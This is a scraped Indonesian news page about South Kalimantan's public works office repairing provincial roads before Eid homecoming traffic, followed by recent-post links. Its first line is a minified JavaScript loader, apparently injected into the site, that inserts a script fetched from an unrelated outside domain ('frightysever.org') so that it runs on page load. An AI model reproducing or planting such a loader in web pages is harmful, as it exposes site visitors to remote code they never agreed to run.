(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PUPR PROV KALSEL

Mudahkan Pemudik, Pemprov Kalsel Pastikan Jalan Mulus


KANALKALIMANTAN.COM, BANJARBARU – Arus mudik lebaran Idulfitri 1445 H sebentar lagi sehingga sangat diperlukan jalan dan jembatan yang nyaman digunakan pemudik lewat jalur darat.

Guna memastikan kelancaran arus mudik dan kenyamanan para pemudik, Pemerintah Provinsi Kalimantan Selatan (Kalsel) melalui Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Kalsel memastikan jalan provinsi di 13 kabupaten dan kota mulus.

Hal tersebut disampaikan Kepala Dinas Pekerjaan Umum dan Penataan Ruang Kalsel, Ir Ahmad Solhan ST, MT di ruang kerjanya, Banjarbaru, Kamis (28/3/2024).

Baca juga: Protes Pemilik Kandang Babi Tak Punya Pekerjaan Selain Beternak

Kepala Dinas Pekerjaan Umum dan Penataan Ruang Kalsel, Ir Ahmad Solhan ST, MT. Foto: MC Kalsel

Solhan mengatakan, jalan provinsi seperti jalan Martapura Lama, jalan Trikora, jalan penghubung Batakan dan Takisung dan ruas jalan di Hulu Sungai Selatan telah diperbaiki dan pemeliharaan dilakukan untuk memastikan kelancaran lalu lintas pada Lebaran tahun ini.

“Dipastikan jalan-jalan tersebut diharapkan selesai dalam masa lima hari setelah Hari Raya Idulfitri 1445 H,” kata Solhan.

Di samping itu, lanjut dia, Pemerintah Provinsi Kalimantan Selatan juga berharap agar jalan provinsi tetap bersih dan bebas dari halangan seperti alat berat selama arus mudik berlangsung.

“Hal ini bertujuan untuk menjaga kenyamanan dan keselamatan pengguna jalan saat memasuki wilayah tersebut,” ujar dia.

Baca juga: Gempa Tektonik 3,3 SR Terjadi di Tanah Bumbu Kalsel

Selain itu, Pemerintah Provinsi Kalimantan Selatan juga mengimbau agar para pengendara angkutan berat selalu berhati-hati saat melintasi jalan provinsi.

“Dengan maraknya perjalanan mudik, diperkirakan akan terjadi kepadatan lalu lintas, sehingga para pengendara diharapkan dapat menggunakan jalan dengan tertib dan lancar.

Namun, tetap diperlukan kewaspadaan yang tinggi untuk menjaga keamanan dan kenyamanan pengguna jalan,” ungkap dia.

Dinas PUPR Kalsel juga mengimbau pengemudi kendaraan berat agar selalu berhati-hati dalam berlalu lintas. Perkiraan kepadatan arus lalu lintas yang tinggi harus diantisipasi dengan mengutamakan keselamatan dan tertib berlalu lintas.

Baca juga: Seru! PLN Mengajar di TK Telkom Banjarbaru

“Dalam mengatasi arus mudik, kesiapan dari pihak-pihak terkait sangat penting untuk mewujudkan libur lebaran yang aman dan nyaman bagi para pemudik.

Semoga dengan persiapan yang matang ini, arus mudik di Kalsel dapat berjalan dengan lancar dan aman,” tutup dia. (kanalkalimantan.com/MCKalsel/kk)

Reporter: kk
Editor: Dhani


Muhammad Andi

Recent Posts

Banmus DPRD Kapuas Susun Kegiatan Masa Persidangan Kedua

KANALKALIMANTAN.COM, KUALA KAPUAS - Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas menggelar rapat Badan Musyawarah… Read More

9 jam ago

Festival Hasil Panen Belajar Program Guru Penggerak di HSU

KANALKALIMANTAN.COM, AMUNTAI - Puluhan hasil karya ditampilkan dalam Festival Hasil Panen Belajar Lokakarya 7 Program… Read More

9 jam ago

Bawaslu Kalsel Buka Seleksi Panwascam, Pengawas Lama Tak Penuhi Syarat Diganti

KANALKALIMANTAN.COM, BANJARMASIN - Badan Pengawas Pemilihan Umum (Bawaslu) Provinsi Kalimantan Selatan membuka rekrutmen pengawas ad… Read More

10 jam ago

Sekretariat DPRD Kapuas Ikut Meriahkan Pawai Budaya

KANALKALIMANTAN.COM, KUALA KAPUAS - Pawai budaya rangkaian memeriahkan Hari Jadi ke-218 Kota Kuala Kapuas dan… Read More

10 jam ago

Opsi Lain Maju Pilkada Banjarbaru, Minimal Kantongi 19.061 KTP Dukungan

KANALKALIMANTAN.COM, BANJARBARU -Komisi Pemilihan Umum (KPU) Kota Banjarbaru akan memulai tahapan penyelenggaraan Pilkada dengan membuka pemenuhan… Read More

11 jam ago

Peringati Hari Kartini, Ini Pesan Pj Bupati HSU

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan menghadiri peringatan Hari… Read More

13 jam ago

This website uses cookies.